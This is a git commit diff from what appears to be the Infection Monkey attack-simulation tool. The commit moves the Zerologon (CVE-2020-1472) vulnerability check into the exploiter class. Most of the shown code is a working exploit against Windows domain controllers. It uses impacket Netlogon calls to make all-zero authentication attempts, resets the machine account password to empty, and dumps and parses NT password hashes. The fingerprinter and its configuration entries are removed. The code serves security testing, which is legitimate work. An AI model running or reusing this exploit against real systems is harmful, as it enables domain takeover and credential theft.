Remove Zerologon fingerprinter (and move required functionality to Zerologon exploiter)

This commit is contained in:
Shreya 2021-02-19 22:14:15 +05:30
parent 869d608e09
commit c227ccd3a1
4 changed files with 89 additions and 159 deletions

View File

@ -10,7 +10,8 @@ from binascii import unhexlify
from typing import Dict, List, Optional from typing import Dict, List, Optional
import impacket import impacket
from impacket.dcerpc.v5 import nrpc import nmb.NetBIOS
from impacket.dcerpc.v5 import epm, nrpc, transport
from impacket.dcerpc.v5.dtypes import NULL from impacket.dcerpc.v5.dtypes import NULL
from common.utils.exploit_enum import ExploitType from common.utils.exploit_enum import ExploitType
@ -19,9 +20,9 @@ from infection_monkey.exploit.zerologon_utils.dump_secrets import DumpSecrets
from infection_monkey.exploit.zerologon_utils.options import \ from infection_monkey.exploit.zerologon_utils.options import \
OptionsForSecretsdump OptionsForSecretsdump
from infection_monkey.exploit.zerologon_utils.wmiexec import Wmiexec from infection_monkey.exploit.zerologon_utils.wmiexec import Wmiexec
from infection_monkey.network.zerologon_fingerprint import ZerologonFinger
from infection_monkey.utils.capture_output import StdoutCapture from infection_monkey.utils.capture_output import StdoutCapture
LOG = logging.getLogger(__name__) LOG = logging.getLogger(__name__)
@ -36,23 +37,16 @@ class ZerologonExploiter(HostExploiter):
def __init__(self, host: object): def __init__(self, host: object):
super().__init__(host) super().__init__(host)
self.vulnerable_port = None self.vulnerable_port = None
self.zerologon_finger = ZerologonFinger()
self.exploit_info['credentials'] = {} self.exploit_info['credentials'] = {}
self._extracted_creds = {} self._extracted_creds = {}
def _exploit_host(self) -> bool: def _exploit_host(self) -> bool:
self.dc_ip, self.dc_name, self.dc_handle = self.zerologon_finger._get_dc_details(self.host) self.dc_ip, self.dc_name, self.dc_handle = ZerologonExploiter.get_dc_details(self.host)
if self.is_exploitable(): is_exploitable, rpc_con = self.is_exploitable()
if is_exploitable:
LOG.info("Target vulnerable, changing account password to empty string.") LOG.info("Target vulnerable, changing account password to empty string.")
# Connect to the DC's Netlogon service.
try:
rpc_con = self.zerologon_finger.connect_to_dc(self.dc_ip)
except Exception as e:
LOG.info(f"Exception occurred while connecting to DC: {str(e)}")
return False
# Start exploiting attempts. # Start exploiting attempts.
LOG.debug("Attempting exploit.") LOG.debug("Attempting exploit.")
_exploited = self._send_exploit_rpc_login_requests(rpc_con) _exploited = self._send_exploit_rpc_login_requests(rpc_con)
@ -60,8 +54,7 @@ class ZerologonExploiter(HostExploiter):
rpc_con.disconnect() rpc_con.disconnect()
else: else:
LOG.info("Exploit not attempted. " LOG.info("Exploit not attempted. Target is most likely patched, or an error was encountered.")
"Target is most likely patched, or an error was encountered by the Zerologon fingerprinter.")
return False return False
# Restore DC's original password. # Restore DC's original password.
@ -76,14 +69,80 @@ class ZerologonExploiter(HostExploiter):
return _exploited return _exploited
def is_exploitable(self) -> bool: @staticmethod
if self.zerologon_finger._SCANNED_SERVICE in self.host.services: def get_dc_details(host: object) -> (str, str, str):
return self.host.services[self.zerologon_finger._SCANNED_SERVICE]['is_vulnerable'] dc_ip = host.ip_addr
else: dc_name = ZerologonExploiter.get_dc_name(dc_ip=dc_ip)
is_vulnerable = self.zerologon_finger.attempt_authentication(dc_handle=self.dc_handle, dc_handle = '\\\\' + dc_name
dc_ip=self.dc_ip, return dc_ip, dc_name, dc_handle
dc_name=self.dc_name)
return is_vulnerable @staticmethod
def get_dc_name(dc_ip: str) -> str:
"""
Gets NetBIOS name of the Domain Controller (DC).
"""
try:
nb = nmb.NetBIOS.NetBIOS()
name = nb.queryIPForName(ip=dc_ip) # returns either a list of NetBIOS names or None
return name[0] if name else ''
except BaseException as ex:
LOG.info(f'Exception: {ex}')
def is_exploitable(self) -> (bool, object):
# Connect to the DC's Netlogon service.
try:
rpc_con = ZerologonExploiter.connect_to_dc(self.dc_ip)
except Exception as e:
LOG.info(f"Exception occurred while connecting to DC: {str(e)}")
return False, None
# Try authenticating.
for _ in range(0, self.MAX_ATTEMPTS):
try:
rpc_con_auth_result = self._try_zero_authenticate(rpc_con)
if rpc_con_auth_result is not None:
return True, rpc_con_auth_result
except Exception as ex:
LOG.info(ex)
return False, None
return False, None
@staticmethod
def connect_to_dc(dc_ip) -> object:
binding = epm.hept_map(dc_ip, nrpc.MSRPC_UUID_NRPC, protocol='ncacn_ip_tcp')
rpc_con = transport.DCERPCTransportFactory(binding).get_dce_rpc()
rpc_con.connect()
rpc_con.bind(nrpc.MSRPC_UUID_NRPC)
return rpc_con
def _try_zero_authenticate(self, rpc_con: object) -> object:
plaintext = b'\x00' * 8
ciphertext = b'\x00' * 8
flags = 0x212fffff
# Send challenge and authentication request.
nrpc.hNetrServerReqChallenge(
rpc_con, self.dc_handle + '\x00', self.dc_name + '\x00', plaintext)
try:
server_auth = nrpc.hNetrServerAuthenticate3(
rpc_con, self.dc_handle + '\x00', self.dc_name +
'$\x00', nrpc.NETLOGON_SECURE_CHANNEL_TYPE.ServerSecureChannel,
self.dc_name + '\x00', ciphertext, flags
)
assert server_auth['ErrorCode'] == 0
return rpc_con
except nrpc.DCERPCSessionError as ex:
if ex.get_error_code() == 0xc0000022: # STATUS_ACCESS_DENIED error; if not this, probably some other issue.
pass
else:
raise Exception(f'Unexpected error code: {ex.get_error_code()}.')
except BaseException as ex:
raise Exception(f'Unexpected error: {ex}.')
def _send_exploit_rpc_login_requests(self, rpc_con) -> bool: def _send_exploit_rpc_login_requests(self, rpc_con) -> bool:
# Max attempts = 2000. Expected average number of attempts needed: 256. # Max attempts = 2000. Expected average number of attempts needed: 256.
@ -96,7 +155,7 @@ class ZerologonExploiter(HostExploiter):
return False return False
def try_exploit_attempt(self, rpc_con): def try_exploit_attempt(self, rpc_con) -> Optional[object]:
try: try:
exploit_attempt_result = self.attempt_exploit(rpc_con) exploit_attempt_result = self.attempt_exploit(rpc_con)
return exploit_attempt_result return exploit_attempt_result
@ -163,7 +222,7 @@ class ZerologonExploiter(HostExploiter):
# Connect to the DC's Netlogon service. # Connect to the DC's Netlogon service.
try: try:
rpc_con = self.zerologon_finger.connect_to_dc(self.dc_ip) rpc_con = ZerologonExploiter.connect_to_dc(self.dc_ip)
except Exception as e: except Exception as e:
LOG.info(f"Exception occurred while connecting to DC: {str(e)}") LOG.info(f"Exception occurred while connecting to DC: {str(e)}")
return False return False
@ -207,7 +266,7 @@ class ZerologonExploiter(HostExploiter):
return user, self._extracted_creds[user] return user, self._extracted_creds[user]
except Exception as e: except Exception as e:
LOG.info(f"Exception occurred while dumping secrets to get Administrator password's NT hash: {str(e)}") LOG.info(f"Exception occurred while dumping secrets to get some username and its password's NT hash: {str(e)}")
return None return None
@ -221,7 +280,7 @@ class ZerologonExploiter(HostExploiter):
dumped_secrets = dumper.dump().split('\n') dumped_secrets = dumper.dump().split('\n')
return dumped_secrets return dumped_secrets
def _extract_user_creds_from_secrets(self, dumped_secrets: List[str]) -> Dict: def _extract_user_creds_from_secrets(self, dumped_secrets: List[str]) -> None:
# format of secret we're looking for - "domain\uid:rid:lmhash:nthash:::" # format of secret we're looking for - "domain\uid:rid:lmhash:nthash:::"
re_phrase =\ re_phrase =\
r'([\S]*[:][0-9]*[:][a-zA-Z0-9]*[:][a-zA-Z0-9]*[:][:][:])' r'([\S]*[:][0-9]*[:][a-zA-Z0-9]*[:][a-zA-Z0-9]*[:][:][:])'
@ -407,11 +466,13 @@ class ZerologonExploiter(HostExploiter):
return rpc_con return rpc_con
def assess_restoration_attempt_result(self, restoration_attempt_result): def assess_restoration_attempt_result(self, restoration_attempt_result) -> bool:
if restoration_attempt_result: if restoration_attempt_result:
LOG.debug("DC machine account password should be restored to its original value.") LOG.debug("DC machine account password should be restored to its original value.")
return True return True
return False
class NetrServerPasswordSet(nrpc.NDRCALL): class NetrServerPasswordSet(nrpc.NDRCALL):
opnum = 6 opnum = 6

View File

@ -1,120 +0,0 @@
"""
Implementation from https://github.com/SecuraBV/CVE-2020-1472
"""
import logging
import nmb.NetBIOS
from impacket.dcerpc.v5 import epm, nrpc, transport
from infection_monkey.network.HostFinger import HostFinger
LOG = logging.getLogger(__name__)
class ZerologonFinger(HostFinger):
# Class related consts
MAX_ATTEMPTS = 2000
_SCANNED_SERVICE = "NTLM (NT LAN Manager)"
def get_host_fingerprint(self, host) -> bool:
"""
Checks if the Windows Server is vulnerable to Zerologon.
"""
dc_ip, dc_name, dc_handle = self._get_dc_details(host)
if dc_name: # if it is a Windows DC
# Keep authenticating until successful.
# Expected average number of attempts needed: 256.
# Approximate time taken by 2000 attempts: 40 seconds.
LOG.info('Performing Zerologon authentication attempts...')
auth_successful = self.attempt_authentication(dc_handle, dc_ip, dc_name)
self.init_service(host.services, self._SCANNED_SERVICE, '')
if auth_successful:
LOG.info('Success: Domain Controller can be fully compromised by a Zerologon attack.')
host.services[self._SCANNED_SERVICE]['is_vulnerable'] = True
return True
else:
LOG.info('Failure: Target is either patched or an unexpected error was encountered.')
host.services[self._SCANNED_SERVICE]['is_vulnerable'] = False
return False
else:
LOG.info('Error encountered; most likely not a Windows Domain Controller.')
return False
def _get_dc_details(self, host) -> (str, str, str):
dc_ip = host.ip_addr
dc_name = self._get_dc_name(dc_ip)
dc_handle = '\\\\' + dc_name
return dc_ip, dc_name, dc_handle
def _get_dc_name(self, dc_ip: str) -> str:
"""
Gets NetBIOS name of the Domain Controller (DC).
"""
try:
nb = nmb.NetBIOS.NetBIOS()
name = nb.queryIPForName(ip=dc_ip) # returns either a list of NetBIOS names or None
return name[0] if name else ''
except BaseException as ex:
LOG.info(f'Exception: {ex}')
def attempt_authentication(self, dc_handle: str, dc_ip: str, dc_name: str) -> bool:
for _ in range(0, self.MAX_ATTEMPTS):
try:
rpc_con = self.try_zero_authenticate(dc_handle, dc_ip, dc_name)
if rpc_con is not None:
rpc_con.disconnect()
return True
except Exception as ex:
LOG.info(ex)
return False
return False
def try_zero_authenticate(self, dc_handle: str, dc_ip: str, dc_name: str):
# Connect to the DC's Netlogon service.
rpc_con = self.connect_to_dc(dc_ip)
# Use an all-zero challenge and credential.
plaintext = b'\x00' * 8
ciphertext = b'\x00' * 8
# Standard flags observed from a Windows 10 client (including AES), with only the sign/seal flag disabled.
flags = 0x212fffff
# Send challenge and authentication request.
nrpc.hNetrServerReqChallenge(
rpc_con, dc_handle + '\x00', dc_name + '\x00', plaintext)
try:
server_auth = nrpc.hNetrServerAuthenticate3(
rpc_con, dc_handle + '\x00', dc_name +
'$\x00', nrpc.NETLOGON_SECURE_CHANNEL_TYPE.ServerSecureChannel,
dc_name + '\x00', ciphertext, flags
)
# It worked!
assert server_auth['ErrorCode'] == 0
return rpc_con
except nrpc.DCERPCSessionError as ex:
if ex.get_error_code() == 0xc0000022: # STATUS_ACCESS_DENIED error; if not this, probably some other issue.
pass
else:
raise Exception(f'Unexpected error code: {ex.get_error_code()}.')
except BaseException as ex:
raise Exception(f'Unexpected error: {ex}.')
def connect_to_dc(self, dc_ip: str) -> object:
binding = epm.hept_map(dc_ip, nrpc.MSRPC_UUID_NRPC, protocol='ncacn_ip_tcp')
rpc_con = transport.DCERPCTransportFactory(binding).get_dce_rpc()
rpc_con.connect()
rpc_con.bind(nrpc.MSRPC_UUID_NRPC)
return rpc_con

View File

@ -71,16 +71,6 @@ FINGER_CLASSES = {
"safe": True, "safe": True,
"info": "Checks if ElasticSearch is running and attempts to find it's version.", "info": "Checks if ElasticSearch is running and attempts to find it's version.",
"attack_techniques": ["T1210"] "attack_techniques": ["T1210"]
},
{
"type": "string",
"enum": [
"ZerologonFinger"
],
"title": "ZerologonFinger",
"safe": True,
"info": "Checks if server is a Windows Server and tests if it is vulnerable to Zerologon.",
"attack_techniques": ["T1210"]
} }
] ]
} }

View File

@ -222,8 +222,7 @@ INTERNAL = {
"HTTPFinger", "HTTPFinger",
"MySQLFinger", "MySQLFinger",
"MSSQLFinger", "MSSQLFinger",
"ElasticFinger", "ElasticFinger"
"ZerologonFinger"
] ]
} }
} }